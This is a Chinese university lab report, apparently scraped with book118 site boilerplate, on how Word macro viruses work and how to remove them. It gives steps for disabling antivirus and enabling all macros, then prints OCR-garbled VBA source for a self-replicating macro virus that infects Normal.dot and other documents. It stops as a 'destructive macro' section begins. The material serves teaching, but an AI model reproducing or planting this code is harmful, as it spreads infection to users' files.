- 1、本文档共8页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
-
计算机宏病毒分析及去除实验
一、实验目的
1.了解“宏病毒〞机理。
2.掌握去除宏病毒的方法。
3.掌握采用“宏〞和脚本语言进展编程的技术。
二、实验环境
1.Windows*P操作系统。
2.OfficeWord2010字处理软件。
三、实验要求
1.宏的编写。
2.理解宏病毒的作用机制。
四、实验容与步骤:
1.软件设置
首先检查电脑里杀毒软件是否开启,如果开启需要关闭它。然后翻开一个
word文档〔我直接翻开的“计算机宏病毒分析及去除实验〞〕,依次单击“文件〞
——“选项〞,然后在弹出的“word选项〞对话框中单击“信任中心〞,然后再单击
“信任中心设置〞——“宏设置〞。选择“启用所有宏〞,“信任对VBA工程对象模型
的访问〞。
2.宏病毒实现自我复制功能
翻开一个word文档〔我翻开的“计算机宏病毒分析及去除实验〞〕,然后按
Alt+F11调用宏编写窗口,在左侧菜单栏中依次单击“project〔计算机宏病毒分析及
去除实验〕〞—“MicrosoftWord对象〞—“ThisDocument〞,在这里输入实验代
.z.
-
码单击“保存〞,这时该文档就含有了宏病毒,然后单击“执行〞,就立刻弹出一个
窗口,第二次翻开该文档,就自动执行以上代码,并将自身复制到Normal.dot和
当前文档的ThisDocument中,此时所有的word文档关闭时,都将运行以上的病
毒代码,产生影响。我又新建立了一个名字为“111〞的word文档,翻开后关闭就
弹出一个提示框。代码如下:
Macro-1:Micro-Virus
SubDocument_Open()
OnErrorResumeNe*t
Application.DisplayStatusBar=False
Options.SaveNormalPrompt=False
Setourcodemodule=ThisDocument.VBProject.VBponents(1).CodeModule
Sethost=NormalTemplate.VBProject.VBponents(1).CodeModule
IfThisDocument=NormalTemplateThen
Sethost=ActiveDocument.VBProject.VBponents(1).CodeModule
EndIf
Withhost
If.Lines(1,1)Micro-VirusThen
.DeleteLines1,.CountOfLines
.InsertLines1,ourcodemodule.Lines(1,100)
.ReplaceLine2,SubDocument_Close()
IfThisDocument=NormalTemplateThen
.ReplaceLine2,SubDocument_Open()
.z.
-
ActiveDocument.SaveAsActiveDocument.FullName
EndIf
EndIf
EndWith
MsgBo*B1104-何家红-16
EndSub
结果显示如下:
上图为复制完代码保存后,单击执行的结果图
上图为模板被感染病毒的结果图
上图为新建文档“111〞被感染病毒结果图
3.具有一定破坏性的宏
本程序是以著名
文档评论(0)